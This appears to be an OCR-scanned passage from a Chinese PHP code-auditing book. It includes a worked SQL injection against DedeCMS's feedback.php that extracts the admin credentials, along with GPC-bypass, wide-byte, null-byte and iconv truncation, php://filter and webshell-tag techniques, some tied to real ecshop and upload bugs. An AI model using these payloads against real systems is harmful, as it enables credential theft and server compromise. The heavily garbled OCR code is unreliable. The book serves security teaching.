"mid , bad, good , ftype , face , msg ) VALUES ( 52','0',' seayace' , ' xxV , (char(@ V 2), /* ,' 127. 0.0.1, 1, 1433231935 , 
'8,'0,'0,' feedback,’ 0," xx’): 





第 二 次 请 求 : 








/plus/feedback.php? aid-52 


POST 内 容 : 











action-send&comtype-reply&fid-34&isconfirm-yes&validate-sill&msg-*/1, 2, 3, 4, 5, 6, 7, (select/**/concat (userid, 0x3a, pwd) /**/i 








trom/**/dede member/**/limit/**/1) ) $23 





打印 SQL 语句 出 来 看 看 ， 如 图 7-4 所 示 。 


Load URL — http;//localhost/dedecms//plus/feedback.php?aid-52 
Split URL 


Execute 


Enable Post data | | Enable Referrer 


Post data action- send&comtype-reply&fid- 34&isconfirm-yes&validate-sill&msg-*/1,2,3,4,5,6,7 (select/**/concat(userid 0x3a, pwd)/**/from 


/**/dede member/**/limit/**/1))9623 


INSERT INTO 

86 feedback (aid, typeid , username , arctitle , ip, ischeck , dtime , mid , bad , good, ftype , face , msg ) VALUES 
(52, 0, seayace , makelove , (char(8 ^ )),/* , 127.0.0.1, 1 , 1433232163 , 8, 0, 0, feedback, 0, */1,2, 3, 4, 5,6, 7, 
(select/**/concat (userid, 0x3a, pwd) /**/from/**/dede member/**/limit/**/1))& ) 





发 送 两 次 请 求 后 访问 : 








/plus/feedback.php? aid-52 


可 以 看 到 管理 员 密 码 已 经 被 读 取 出 来 ， 如 图 7-5 所 示 。 


评论 : 完全 了 解 AJAX 


评论 列表 (网 友 评 伦 职 世 网 友 表 杰 个 人 人 看法， 并 不 表明 本 站 同意 其 观点 或 证 详 其 描述》 


seaya 


' 
=. a 
1 | | 





第 8 章 "代码 审计 小 把 


有 和 句 话 叫 熟 能 生 巧 ， 说 的 是 做 任何 事情 ， 只 要 做 的 次 数 足够 多 ， 到 达 一 定 熟 悉 程度 后 ， 就 一 定 会 掌握 一 些 技巧 ， 来 优化 我 们 的 效率 ， 那 在 PHP 代 码 审计 这 么 技术 性 的 工作 上 ， 技 巧 是 一 定 有 的 ， 有 了 这 
些 技巧 之 后 ， 我 们 的 代码 审计 就 能 事半功倍 ， 也 能 帮助 我 们 挖掘 到 更 多 更 有 价值 的 漏洞 。 


因为 本 书 主 要 介绍 的 是 PHP 代 码 审计 ， 所 以 PHP 应 用 代码 本 身 之 外 的 漏洞 利用 的 技巧 不 会 介绍 。 下 面 我 们 会 从 怎么 钼 GPC 等 过 滤 、 字 符 串 常见 的 安全 问题 、PHP 输 入 输出 流 、FUZZ 挖 掘 漏洞 以 及 正则 表 
达 式 不 严谨 容易 出 现 的 问题 等 几 个 方面 来 介绍 一 些小 技巧 。 


8.1 钼 GPC 等 转 义 的 空子 


GPC 会 自动 把 我 们 提交 上 去 的 单 引号 等 敏感 字符 给 转 义 掉 ， 这 样 我 们 的 攻击 代码 就 没 法 执行 了 ，GPC 是 PHP 天 生 自 带 的 功能 ， 所 以 是 我 们 最 大 的 天 敌 。 不 过 不 要 担心 ，GPC 并 不 是 把 所 有 变量 都 进行 了 
过 滤 ， 反 而 人 们 容易 忽视 而 又 用 得 多 的 $_ SERVER 变量 没有 被 GPC 过 滤 ， 包 括 编码 转换 的 过 程 中 ， 部 分 情况 下 我 们 也 是 可 以 干掉 GPC 的 转 义 符号 ， 是 不 是 有 点 小 激动 ?下面 我 们 来 仔细 了 解 下 。 


8.1.1 不 受 GPC 保 护 的 $ SERVER 变量 


GPC 上 面 我 们 已 经 介绍 过 ， 是 用 来 过 滤 request 中 提交 的 数据 ， 将 特殊 字符 进行 转 义 来 防止 攻击 ， 在 PHP5 之 后 用 $_ SERVER 取 到 的 header 字 段 不 受 GPC 影 响 ， 所 以 当 GPC 开 启 的 时 候 ， 它 里 面 的 特殊 字 
符 如 单 引 号 也 不 会 被 转 义 掉 ， 另 外 一 点 是 普通 程序 员 很 少 会 考虑 到 这 些 字段 被 修改 。 而 在 header 注 入 里 面 最 常见 的 是 user-agent、referer 以 及 client-ip/x-forward-for， 因 为 大 多 的 Web 应 用 都 会 记录 访 
问 者 的 IP 以 及 referer 等 信息 。 同 样 的 $FILES 变 量 也 一 样 不 受 GPC 保 护 。 
































测试 代码 如 下 : 

<? php 

echo 'GPC'.get magic quotes gpc () ; 

echo '«br /> client-ip = '.$ SERVER["HTTP CLIENT IP"]; 
echo '«br />$ GET[a] = '.$ GET['a']; 








测试 截图 见 图 8-1。 


ME) SE) 查看 (V) HRS) BEB) TB @ Live HTTP Replay 
http;//1270../Lphp?a-19627 W 


| | GET v  http://127.0.0.1/phpsafe/5.1.2.3/1.php?a=1%27 
(«€ | @ 127.0.0.1/phpsafe/5.1.2.3/1.php?a=1' HTTP Headers 
1| Host 127.0.0.1 
\ GPC1 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64: rv:30.0) Ge 
client-ip = ip Accept: text/html, application/xhtml 4xml,application/xml:q- 0. 
$ GETlal = 1V si lla MEME zh-cn;zh;q-0.8,en-us;q-0.5,en;q-0.3 
Accept-Encoding: gzip, deflate 
DNT: 1 
Connection: keep-alive 
client-ip: ip' 


Send POST Content ? 





8.1.2 ”编码 转换 问题 


本 书 前 面 第 4 章 介 绍 过 宽 字 节 注 入 ， 这 就 是 一 种 非常 典型 的 编码 转换 问题 导致 绕 过 GPC 的 方式 。 我 们 之 前 的 举例 说 明 ， 给 一 个 查询 页 面 ID 参 数 请 求 /1.php? id=-1%df and 1=1%23 时 ,这 时 MySQL 
运行 的 SQL 语句 为 : 





select * from user where id=’ 13° and 1-14 








这 是 由 于 单 引 号 被 自动 转 义 成 \、， 前 面 的 %df 和 转 义 字符 \ 反 斜 杠 (%5c) AAS ?odf?65c, hate E TE, KRAS SKATE, TEATS BUBBUSBSI. 


这 个 例子 讲 的 是 PHP 与 MySQL 交 互 过 程 中 发 生 编 码 转换 导致 的 问题 ， 而 其 实 只 要 发 生 编码 转换 就 有 可 能 出 现 这 种 问题 ， 也 就 是 说 在 PHP 自 带 的 编码 转换 函数 上 面 也 会 存在 这 个 问题 ， 比 如 
mb convert encoding () Bax. 


我 们 来 证 实 一 下 ， 代 码 如 下 : 





«meta http-equiv-"Content-Type" content-"text/html; charset=utf-8"/> 
«? php 

$sql-"where id-'".urldecode ("-1$df$5c' -- ") ."'"; 

print r (mb convert encoding ($sql, "UTF-8", "GBK") ) ; ? > 


这 里 要 注意 的 是 ， 把 网 页 和 文件 编码 都 设置 成 UTF-8， 不 然 浏览 器 会 自动 转 码 ， 这 段 代 码 是 把 UTF-8 编 码 转 换 成 GBK， 运 行 这 段 代 码 ， 输 出 如 下 : 
where id-'-1i£' -- ' 


可 以 看 到 也 成 功 闭合 了 前 面 的 单 引 号 。 


这 种 方式 造成 的 SQL 注入 也 有 不 少 先 例 ， 比 如 ecshop 就 出 过 多 次 这 个 问题 ， 我 们 来 看 看 出 现 这 个 问题 的 核心 代码 ， 代 码 位 置 在 includes/cls iconv.php 文 件 的 chinese 类 中 的 Convert () 函数 : 

















function Convert ($source lang, $target lang, S$source string = '') 
pn 
if ( (Sthis-»iconv enabled || $this-»mbstring enabled) && ! (S$this-» config['source lang'] == 'GBK' && Sthis-»config['target lang'] == 'BIG-5') ) 
| if (S$Sthis-»config['target lang'] ! = 'UNICODE') 
$string = $this-» convert iconv mbstring (Sthis-» SourceText, Sthis-»config['target lang'], $this-> config['source lang']) ; 





/* 如 果 正 确 转换 */ 
if ($string) 
{ 





return $string; 


$string = ''; 

$text = SSourceText; 
while ($text) 

{ 





if (ord (substr ($text, 0, 1) ) > 127) 
{ 





if ($this->config['source lang'] ! = 'UTF-8') 





$char = $this-» convert iconv mbstring (substr ($text, 0, 2) , 'UTF-8', Sthis->config ['source lang']) ; 
} 


else 


这 个 函数 的 作用 是 将 UTF-8 的 编码 转换 成 GBK， 本 函数 调用 到 $this->_convert iconv mbstring () 函数 ， 我 们 跟 进 去 看 看 ， 代 码 如 下 : 


function convert iconv mbstring ($string, $target lang, S$source lang) 








if ($this->iconv enabled) 
{ 

$return string = @iconv ($source lang, $target lang, $string) ; 
if ($return string ! == false) 


{ 
} 


if (S$this-»mbstring enabled) 








return $return string; 





S 








if (Ssource lang == 'GBK') 
{ 


} 
if ($target lang == 'GBK') 
{ 


} 
$return string = @mb convert encoding ($string, $target lang, S$source lang) ; 
if ($return string ! == false) 


$source lang = 'CP936'; 





$target lang = 'CP936'; 








可 以 看 到 最 终 调用 iconv () ERÉNEXEEmb convert encoding () 函数 来 进行 转 码 ， 如 果 调 用 这 个 函数 之 后 没有 再 次 过 滤 ， 则 会 存在 注入 问题 。 


8.2 ”神奇 的 字符 串 


中 国文 字 博 大 精深 ， 而 在 计算 机 里 面 就 是 因为 这 些 语 言 的 “博大 ” 即 大 而 杂 ， 导 致 机 器 在 语言 编码 转换 的 时 候 ， 经 常会 出 现 各 种 各 样 的 异常 ， 这 些 神 奇 的 字符 串 就 有 可 能 组 合成 一 堆 乱 码 出 来 ， 也 有 可 
能 直接 把 程序 搞 骨 省 掉 ， 不 过 总 有 那么 一 些 字符 ， 可 以 帮助 我 们 在 利用 漏洞 的 时 候 变 得 更 简单 一 些 ， 下 面 我 们 就 来 看 看 是 哪些 函数 这 么 调皮 。 


8.2.1 字符 处 理 函 数 报错 信息 泄露 


页 面 的 报错 信息 通常 能 泄露 文件 绝对 路 径 、 代 码 、 变 量 以 及 函数 等 信息 ， 页 面 报错 有 很 多 情况 ， 比 如 参数 少 了 或 者 多 了 、 参 数 类 型 不 对 、 数 组 下 标 越界 、 页 面 超时 ， 等 ， 不 过 并 不 是 所 有 情况 下 页 面 都 
会 出 现 错误 信息 ， 要 显示 错误 信息 需要 打开 在 PHP 配 置 文件 php.ini 中 设置 display_errors=on 或 者 在 代码 中 加 入 error_reporting () Ba, error_reporting () 函数 有 几 个 选项 来 配置 显示 错误 的 等 级 ， 列 
表 如 下 : 



































































































































WARNING 
,PARSE 
| NOTICE 
' CORE ERROR 
| CORE. WARNING 
' COMPILE ERROR 
| COMPILE WARNING 
| USER ERROR 
| USER WARNING 
USER NOTIC 
: STRICT 
; RECOVERABLE ERROR 














其 中 最 常用 的 是 E_ ALL、E_ WARNING、E_NOTICE、E_ALL 代 表 提示 所 有 问题 ，E_ WARNING 代 表 显 示 错 误 信息 ，E_NOTICE 则 是 显示 基础 提示 信息 。 


大 多 数 错误 提示 都 会 显示 文件 路 径 ， 在 渗透 测试 中 ， 经 常 遇 到 webshell 的 场景 要 用 到 文件 绝对 路 径 ， 所 以 这 个 利用 页 面 报错 来 获取 Web 路 径 的 方式 也 比较 实在 了 ， 用 户 提 交 上 去 的 数据 后 端 大 多 是 以 字 
符 串 方式 处 理 ， 所 以 利用 字符 串 处 理子 数 报错 成 了 必 不 可 少 的 方法 ， 对 于 利用 参数 来 报错 的 方式 ， 给 函数 传 入 不 同类 型 的 变量 是 最 实用 的 方式 。 


大 多 数 程序 会 使 用 trim () 函数 对 用 户 名 等 值 去 掉 两 边 的 空格 ， 这 时 候 如 果 我 们 传 入 的 用 户 名 参数 是 一 个 数组 ， 则 程序 就 会 报错 ， 测 试 代码 如 下 : 


«? php 
echo trim ($ GET['a']) ; 


当 我 们 请 求 /1.php? al]=test 时 ,程序 报错 如 下 ， 如 图 8-2 所 示 。 


LEN 


=) LoadURL  Mhttp;/localhost/test/1.php?a[]-test 


Split URL 


^ Execute 


|| Enable Post data | | Enable Referrer 


Warning: trim() expects parameter 1 to be string, array given in D: wwwMtestM. php on line 3 





类 似 的 函数 还 有 很 多 很 多 ， 比 如 


addcslashes () 、addslashes () 、bin2hex () 、chop () 、chr () 、chunk split () 、convert cyr string () , convert uudecode () , convert uuencode () 、count chars () 、 
crc32 () ~、 crypt () , echo () , explode () ~ fprintf () , get html translation table () , hebrev () , hebrevc () , html entity decode () , htmlentities () 、 
htmlspecialchars decode () , htmlspecialchars () . implode () , join () . levenshtein () , localeconv () 、ltrim () , md5 file () , md5 () , metaphone () , money format () 、 
nl langinfo () 、 nl2br () , number format () , ord () . parse str () , print () , printf () , quoted printable decode () , quotemeta () , rtrim () , setlocale () , sha1 file () 、 


shal () , similar text () , soundex () . sprintf () , sscanf () , str ireplace () , str pad () , str repeat () , str replace () , str rot13 () , str shuffle () , str split () 、 


str word count () , strcasecmp () , strchr () , strcmp () , strcoll () , strcspn () , strip tags () . stripcslashes () . stripos () , stripslashes () , stristr () | strlen () 、 
strnatcasecmp () . strnatcmp () , strncasecmp () , strncmp () , strpbrk () ,. strpos () ~、 strrchr () , strrev () , strripos () , strrpos () , strspn () , strstr () , strtok () 、 
strtolower () , strtoupper () . strtr () , substr compare () , substr count () , substr replace () . substr () ~ trim () , ucfirst () , ucwords () , vfprintf () . vprintf () 、 


vsprintf () , wordwrap () . strtolower () , strtoupper () , ucfirst () , ucwords () , ucfirst () , ucwords () ， 等 等 函数 。 


8.2.2 ”字符 串 截 断 

如 果 你 以 前 做 过 渗透 测试 ， 那 字符 串 截断 应 该 是 我 们 比较 熟悉 的 一 个 利用 方式 ， 特 别 是 在 零 几 年 ， 在 利用 文件 上 传 漏洞 的 时 候 ， 经 常会 用 到 抓 包 ， 然 后 修改 POST 文件 上 传 数据 包 里 面 的 文件 ， 在 文件 名 
里 面 加 一 个 %00， 用 来 绕 过 文件 扩展 名 的 检查 ， 又 能 把 脚本 文件 写 入 到 服务 器 中 ， 下 面 我 们 就 来 了 解 下 其 中 的 原理 吧 ，。 
8.2.2.1 ” %00 空 字符 截断 


字符 串 截断 被 利用 最 多 的 是 在 文件 操作 上 面 ， 通 常用 来 利用 文件 包含 漏洞 和 文件 上 传 漏洞 ，%00 即 NULL 是 会 被 GPC 和 addslashes () 函数 过 滤 挤 ， 所 以 要 想 用 %00 截 断 需 要 GPC 关 闭 以 及 不 被 
addslashes () 函数 过 滤 ， 另 外 在 PHP5.3 之 后 的 版 本 全 面 修复 了 文件 名 %00 截 断 的 问题 ， 这 个 版 本 以 后 也 是 不 能 用 这 种 方式 截断 。 为 什么 PHP 在 文件 操作 的 时 候 用 %00 会 截断 字符 ”PHP 基 于 C 语 言 
发 ，%00 在 URL 解 码 后 为 \0，\0 在 C 语 言 中 是 字符 串 结束 符 ， 遇 到 \0 的 时 候 以 为 到 了 字符 串 结尾 ， 不 再 读 取 后 面 的 字符 串 ， 自 然而 然 的 就 理解 成 了 截断 。 


做 一 个 简单 的 测试 ， 测 试 代码 (1.php) 





«? php 
include ( $ GET['f'].'.php') ; 


在 同 目录 下 面 新 建文 件 2.txt， 内 容 为 输出 phpinfo 信 息 代 码 ， 当 我 们 请 求 /1.php? f=2.txt9%00 时 ， 实 际 上 包含 了 2.txt 这 个 文件 ， 正 常 执行 phpinfo 代 码 。 


8.2.2.2 iconv 函 数字 符 编 码 转换 截断 

iconv () 函数 用 来 做 字符 编码 转换 ， 比 如 从 UTF-8 转 换 到 GBK， 字 符 集 的 编码 转换 总 会 存在 一 定 的 差异 性 ， 导 致 部 分 编码 不 能 被 成 功 转 换 ， 也 就 是 出 现 常 说 的 乱码 。 在 使 用 iconv () 函数 转 码 的 时 
候 ， 当 遇 到 不 能 处 理 的 字符 串 则 后 续 字符 串 会 不 被 处 理 。 

我 们 来 做 一 个 简单 的 测试 ， 测 试 代码 如 下 : 


<? php 

Sa="1"'.chr (130) .'2'; 

echo $a; 

echo '«br /»'; 

echo iconv ("UTF-8", "gbk", $a) ; 


我 们 执行 这 段 代 码 的 行 结果 如 图 8-3 所 示 。 


a | SQOl- X55- 上 ncr 


Load URL http://localhost/test/1.php 


Split URL 
Execute 
|| Enable Post data | | Enable Refe 





图 8-3 
可 以 看 到 第 一 次 输出 $a 变量 ，1 和 2 都 被 正常 输出 ， 当 使 用 iconv() RARR, Mchr (130) 字符 开始 之 后 的 字符 串 都 没有 输出 ， 已 经 被 成 功 截断 。 经 过 笔者 fuzz 测 试 ， 当 我 们 文件 名 中 有 
chr (128) 到 chr (255) 之 间 都 可 以 截断 字符 。 
这 种 截断 有 很 多 利用 常见 ， 下 面 我 们 来 看 一 个 真实 的 案例 ， 乌 云 平台 漏洞 【建站 之 星 模糊 测试 实战 之 任意 文件 上 传 漏洞 】， 漏 洞 编号 WooYun-2014-48293， 漏 洞 作者 为 felixk3y， 漏 洞 发 生 
在 /module/mod tool.php 文 件 第 89 行 起 ，img create () 函数 ， 代 码 如 下 : 


public function img create () { 
Sfile info -& ParamHolder: : get ('img name', array (), PS FILES) ; 

if ($file info['error'] > 0) { i B 
Notice: : set ('mod marquee/msg', |  ('Invalid post file data! ') ) ; 
Content: : redirect (Html: : uriquery ('mod tool', "upload img!) ) ; 












































if (! preg match ('/N. ('.PIC ALLOW EXT.') $/i', $file info["name"]) ) { 
Notice: : set ('mod marquee/msg', _ ('File type error! ') ; 
Content: : redirect (Html: : uriquery ('mod marquee', "'upload img') ) ; 


























if (file exists (ROOT.'/upload/image/'.$file info["name"]) ) { 
$file info["name"] = Toolkit: : randomStr (8) .strrchr ($file info["name"], ".") ; 
































H- =~ 





f (! $this-> savelinkimg ($file info) ) { 
Notice: : set ('mod marquee/msg', __ ('Link image upload failed! ') ) ; 


Content: : redirect (Html: : uriquery ('mod marquee', 'upload_img') ) ; 





这 是 一 个 文件 上 传 的 代码 ， 其 中 此 漏洞 的 关键 代码 在 : 














if (! $this-> savelinkimg ($file info) ) { 
Notice: : set ('mod marquee/msg', |  ('Link image upload failed! ') ) ; 
Content: : redirect (Html: : uriquery ('mod marquee', "'upload img') ) ; 


在 这 里 调用 _savelinkimg () 函数 保存 文件 ， 跟 进 该 函数 ， 函 数 代码 如 下 : 








private function savelinkimg ($struct file) { 
































$struct file['name'] = iconv ("UTF-8", "gb2312", $struct file['name']) ; 
echo $struct file['name']; 
move uploaded file ($struct file['tmp name'], ROOT.'/upload/image/'.$struct file['name']) ; 
return ParamParser: : fire virus (ROOT.'/upload/image/'.$struct file['name']) ; 
} 
代码 中 : 
$struct file['name'] = iconv ("UTF-8", "gb2312", Sstruct file['name']) ; 








对 文件 名 进行 转 码 ， 之 后 : 





move uploaded file ($struct file['tmp name'], ROOT.'/upload/image/'.$struct file['name']) ; 








写 入 文件 ， 这 里 就 出 现 了 我 们 上 面 说 到 的 编码 转换 ， 最 终 导 致 可 以 上 传 任意 文件 。 


8.3 php: /输入 输出 流 


提 到 流 ， 大 家 会 想到 水 流 或 者 数据 流 ，PHP 提 供 了 php:// 的 协议 允许 访问 PHP 的 输入 输出 流 、 标 准 输入 输出 和 错误 描述 符 ， 内 存 中 、 磁 盘 备 份 的 临时 文件 流 以 及 可 以 操作 其 他 读 取 写 入 文件 资源 的 过 滤 
器 。 主 要 提供 如 下 访问 方式 来 使 用 这 些 封装 器 : 











php: //memory 
php: //temp 
php: //filter 








使 用 最 多 的 是 php://input、php://output 以 及 php: //filter， 其 中 php://input 是 可 以 访问 请 求 的 原始 数据 的 只 读 流 。 即 可 以 直接 读 取 到 POST 上 没有 经 过 解析 的 原始 数据 ， 但 是 php://input 不 能 在 获 
取 “multipart/form-data” 方 式 提 交 的 数据 。 我 们 做 一 个 测试 ， 测 试 代码 如 下 : 


<? php 
echo file get contents ("php: //input") ; 





当 我 们 用 POST 提交 a=111111 时 ，a=111111 被 直接 打印 出 来 ， 如 图 8-4 所 示 。 


-ncryption- Encoding” Other- 


http://localhost/test/1.php 


I7| Enable Post data Enable Referrer 


a=111111 


a-111111 
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而 php://output 是 一 个 只 写 的 数据 流 ， 跟 php://input 相 反 ，php://input 是 读 取 POST 提 交 上 来 的 数据 ， 而 php://output 则 是 将 流 数据 输出 。 


php://filter 是 一 个 文件 操作 的 协议 ， 可 以 对 磁盘 中 的 文件 进行 读 写 操 作 ， 效 果 类 似 于 readfile () 、file () 和 file_get_contents () ， 它 有 多 个 参数 可 以 进行 相应 的 操作 ， 说 明 如 表 8-1 所 示 。 


表 8-1 


名 Js i: 述 


resource-« 要 过 滤 的 数据 流 > BRE DAA. ERE T RE ce et HE AY A it 
See epee Z SAAE, A ieee ake Pea oe, UEA (|) 
read=< jx f HJ fie 91] Ze > Er 
NIE 
. t " Vite “ak zm ribs in pre, Aig — Paks pea ee, DEIN ( 


Sin fy (|) 分隔。 分 隔 
任何 没有 以 read= 或 write= (FA 的 贤 选 兹 列表 会 视 情 况 应 


<; BYE AY nr ve p] > 用 于 读 或 写 链 
BT ES BE 


我 们 来 测试 使 用 php: Wfilter 写 文件 ， 测 试 代码 如 下 : 


«? php 
file put contents ("php: //filter/write-string.rotl3/resource-example.txt", "Hello World") ; ? > 











当 我 们 执行 代码 的 时 候 ， 会 像 脚本 同 目 录 下 写 入 “example.txt” 文 件 ， 内 容 为 rot13 编 码 过 的 “Hello World" , fphp: Wfilter 还 可 以 用 来 读 文件 ， 如 果 有 远程 文件 保护 漏洞 ， 类 似 如 下 的 代码 : 





«? php 
include ($ GET['f']) ; ? > 





正常 情况 下 如 果 我 们 直接 传 入 一 个 文件 名 ， 则 是 会 被 include 函 数 包含 并 执行 ， 如 果 我 们 想 读 取 Web 目 录 下 的 PHP 文 件 ， 则 可 以 通过 请 求 : 





/l.php? f=php: //filter/convert.base64-encode/resource-1.php 


来 将 文件 进行 Base64 编 码 后 输出 ， 输 入 结果 如 图 8-5 所 示 。 


Encryption» Encoding: Other- 
http:;//localhost/test/1.php?file- php://filter/convert.base64-encode/resource-1.php 


[^] Enable Post data [| Enable Referrer 
PD9waHANCmluY2xlZGUg]F9HRVRb J]2ZpbGUnXTsgzIAOK 





8.4 ”PHP 代 码 解析 标签 
PHP 有 几 种 解析 标签 的 写法 来 标识 PHP 代 码 ， 比 如 最 标准 的 <? php? >， 当 PHP 解 析 器 找到 这 个 标签 的 时 候 ， 就 会 执行 这 个 标签 里 面 的 代码 ， 实 际 上 除了 这 种 写法 外 还 有 一 些 标签 ,分 别 如 下 : 
«script language="php">http://www.hzcourse.com/resource/readBook?path=/openresources/teach ebook/uncompressed/15497/OEBPS/Text/...</script>， 这 种 方式 写法 


1) 脚本 标签 : 
有 点 像 JavaScript， 不 过 也 是 可 以 正常 解析 PHP 代 码 。 


2) 短 标签 : <? ..? > ， 使 用 短 标签 前 需要 在 php.ini 中 设置 short_ open_tag=on， 默 认 是 on 状态 。 


3) asp 标 签 : <%...%> ， 在 PHP 3.0.4 版 后 可 用 ， 需 要 在 php.ini 中 设置 asp_ tags=on， 默 认 是 off。 
因为 有 的 程序 在 后 台 配 置 模板 的 时 人 息 ， 禁 止 提交 <? php? > 这 样 的 标签 来 执行 PHP 代 码 ， 但 是 大 部 分 程序 会 存在 过 滤 不 全 的 问题 ， 所 以 这 些 各 式 各 样 的 写法 常常 用 于 留 后 门 以 及 绕 过 Web 程 序 或 者 waf 


的 防护 写 入 webshell。 
我 们 来 测试 脚本 标签 方式 ， 测 试 代码 如 下 : 


<script language="php"> 
phpinfo () 
</script> 


O 
一 、 








执行 后 如 图 8-6 所 示 。 


Load URL — http://localhost/test/1.php 
Split URL 


Execute 
Enable Post data Enable Referrer 





可 以 看 到 PHP 代 码 可 以 正常 解析 执行 。 


8.5 ” ”fuzz 漏洞 发 现 


fuzz 指 的 是 对 特定 目标 的 模糊 测试 ， 这 里 要 注意 的 是 ， 针 对 特定 目标 甚至 说 是 特定 请 求 ， 它 不 同 于 漏洞 扫描 器 进行 批量 漏洞 扫描 ， 不 过 它们 的 初衷 都 是 以 发 现 bug (漏洞 ) 为 目的 。 由 于 本 书 主要 介绍 
代码 安全 ， 所 以 我 们 后 面 所 说 的 fuzz 都 是 安全 方向 的 fuzz。fuzz 在 很 早 就 应 用 在 软件 测试 领域 ,并且 发 现 了 大 量 不 可 预知 的 漏洞 ，fuzz 到 | 底 是 怎么 样 的 一 个 东西 ， 我 们 来 通过 它 的 工作 原理 流程 认识 一 下 ， 
大 概 流程 如 图 8-7 所 示 。 


服务 /进程 








图 8-7 


举 个 最 简单 的 读 文件 例子 ， 当 我 们 用 Office Word 打 开 doc 文 档 的 时 人 息 ，Word 软 件 会 按照 指定 的 格式 读 取 文件 的 内 容 ， 如 果 文 件 格式 出 现 异常 字符 ，Word 无 法 解析 ， 而 又 没有 提前 捕捉 到 这 种 类 型 的 
错误 ， 则 有 可 能 引发 Word 程 序 崩 演 ， 这 就 是 一 个 bug， 这 时 候 我 们 就 可 以 通过 工具 生成 大 量 带 有 异常 格式 或 者 字符 的 doc 文 档 ， 然 后 调用 Word 程 序 去 读 取 ， 尝 试 发 现 更 多 的 bug， 这 就 是 一 个 完整 的 fuzz 
测试 例子 。 虽 然 它 不 是 一 种 纯 白 盒 的 漏洞 挖掘 方法 ， 但 我 们 在 白 盒 审计 过 程 中 ， 也 经 常 需 要 用 到 fuzz 的 方式 来 寻找 漏洞 利用 方法 。 


目前 互联 网 上 已 经 有 不 少 fuzz 工 具 来 专门 做 各 种 各 样 的 fuzz 测 试 ， 比 如 无 线 、Web、 浏 览 器 、 协 议 ， 等 等 ， 在 Web 安 全 这 块 ， 使 用 比较 多 的 像 pywebfuzz， 基 于 Python 开发 ， 不 过 相对 来 说 这 个 工具 
年 代 还 是 有 点 久 了 ， 可 以 用 的 payload 还 算 比 较 全 ， 比 较 常 见 的 文件 包含 、 文 件 上 传 、SQL 注 入 、XSS 等 都 支持 ,详细 的 列表 如 图 8-8 所 示 。 
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图 8-8 


playload 文 件 在 各 个 目录 下 面 ， 我 们 打开 其 中 一 个 payload 规 则 文件 后 ， 可 以 看 到 类 似 如 下 的 规则 : 
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我 们 之 前 在 8.2.2.2 节 介绍 iconv 函 数字 符 编 码 转 换 截断 时 提 到 过 一 个 字符 串 枚 举 来 尝试 寻找 能 导致 iconv () 函数 异常 而 截断 数据 ， 也 是 fuzz 非 常 典 型 的 一 种 利用 方式 ， 当 时 fuzz 用 的 代码 非常 粗糙 ， 如 
下 所 示 : 





<? php 
for ($i=0; $i<1000; $i++) 
{ 








Sa-'l'.chr (Si) .'2'; 

echo $i.' -- '; 

echo iconv ("UTF-8", "gbk", $a); 
echo '«br /»'; 





运行 脚本 后 结果 如 下 ， 当 遇 到 不 能 正常 转 码 的 时 候 出 现 字符 串 截 断 ， 并 且 iconv () 函数 报 出 一 个 notice 提 示 ， 如 图 8-9 所 示 。 


= $ SQL- XSS- Encryption- Encoding- Other- 
x Load URL http://localhost/test/1.php 

Ü Split URL 

Execute 
Enable Post data Enable Referrer 

125 -- 1}2 

126 -- 1-2 

127 -- 12 

128 -- 

Notice: 1conv() [function 1conv]: Detected an illegal character ın input string in D:\wwwi\test\l.php on line 6 
] 

129 一 


Notice: 1conv() [function .1conv]: Detected an illegal character in input string in D:\wwwitest\l.php on line 6 
l 


130 -- 

Notice: iconv() [function iconv]: Detected an illegal character in 1nput string in D:\wwwitest\l.php on line 6 
| 

131 -- 

Notice: 1conv() [function 1conv]: Detected an illegal character in input string in D:\wwwitest\l.php on line 6 
l 

132 -- 

Notice: 1conv() [function iconv]: Detected an illegal character in input string in D:\www\test\l.php on line 6 
l 

133 -- 





8.6 不 严谨 的 正则 表达 式 


很 多 程序 在 判断 文件 上 传 扩展 名 、URL 解 析 、 入 库 参 数 等 值 的 时 候 ， 都 会 使 用 正则 表达 式 ， 正 则 表达 式 确实 是 一 个 非常 方便 和 灵活 的 东西 ， 能 够 帮助 我 们 少 写 很 多 逻辑 处 理 的 代码 ， 但 是 正则 表达 式 也 


跟 程 序 语言 一 样 ， 规 则 写 得 不 严谨 ， 就 会 导致 安全 问题 产生 ， 至 今 已 经 有 很 多 程序 在 这 块 栽 了 跟头 ， 常 见 的 几 种 问题 如 下 。 


1. 没 有 使 用 ^ 和 $ 限 定 匹配 开始 位 置 


举例 来 说 明 ， 通 过 HTTP_CLIENT _IP 来 获取 用 户 IP， 其 中 这 个 值 是 可 以 被 用 户 修改 的 ， 所 以 一 般 都 会 在 服务 端 再 过 滤 一 下 ， 看 看 是 否 被 修改 过 ， 而 过 滤 不 严格 的 正则 表达 式 很 多 都 写 
“\d+\xd+\NAd+\Nxd+” 的 形式 ， 用 代码 来 看 看 它 的 问题 的 在 哪 : 








Sip=$ SERVER['HTTP CLIENT IP']; 
if (preg match ('/\d+\.\d+\.\d+\.\d+/"', $ip) ) 
{ 


























echo Sip; 





当 请 求 头 里 面 添加 “client-ip: 127.0.0.1aa” 时 输出 127.0.0.1aa， 同 样 通过 检测 ， 严 谨 一 点 的 正则 应 该 写成 “^\d+\Nd+N\Nd+N\Nd+$” 。 
2. 特 殊 字 符 未 转 义 


在 正则 表达 式 里 ， 所 有 能 被 正则 表达 式 引 警 解析 的 字符 都 算是 特殊 字符 ， 而 在 匹配 这 些 字 符 的 原 字符 时 需要 使 用 反 斜 杠 (V) 来 进行 转 义 ， 如 果 不 进行 转 义 ， 像 样 英文 句号 (.) 则 可 用 来 表示 任何 字 


， 存 在 安全 隐患 。 下 面 介绍 一 个 例子 ， 代 码 如 下 : 


<? php 

Sfilename=urldecode ('xxx.php$00jpg') ; 

if (preg match ('/. (jpglgiflpng|lbmp) $/i', $filename) ) 
{ 











file put contents ($filename, 'aa') ; 
} 
else{ 
echo ' 不 允许 的 文件 扩展 名 '; 
)? » 





f. 


从 这 段 代 码 的 意思 可 以 看 出 ， 程 序 员 原 本 是 想 检查 文件 的 扩展 名 ， 如 果 不 是 图 片 文件 则 不 允许 上 传 ， 但 是 在 检查 扩展 名 的 时 候 ， 正 则 表达 式 里 面 扩展 名 前 面 的 点 C) 没有 进行 转 义 ， 导 致 变 成 了 全 匹配 
如 果 这 时 候 提交 的 文件 名 是 xxx.php%00jpg ， 则 会 绕 过 检查 并 写 入 一 个 PHP 脚 本 文件 。 


8.7 十 余 种 MySQL 报 错 注 入 


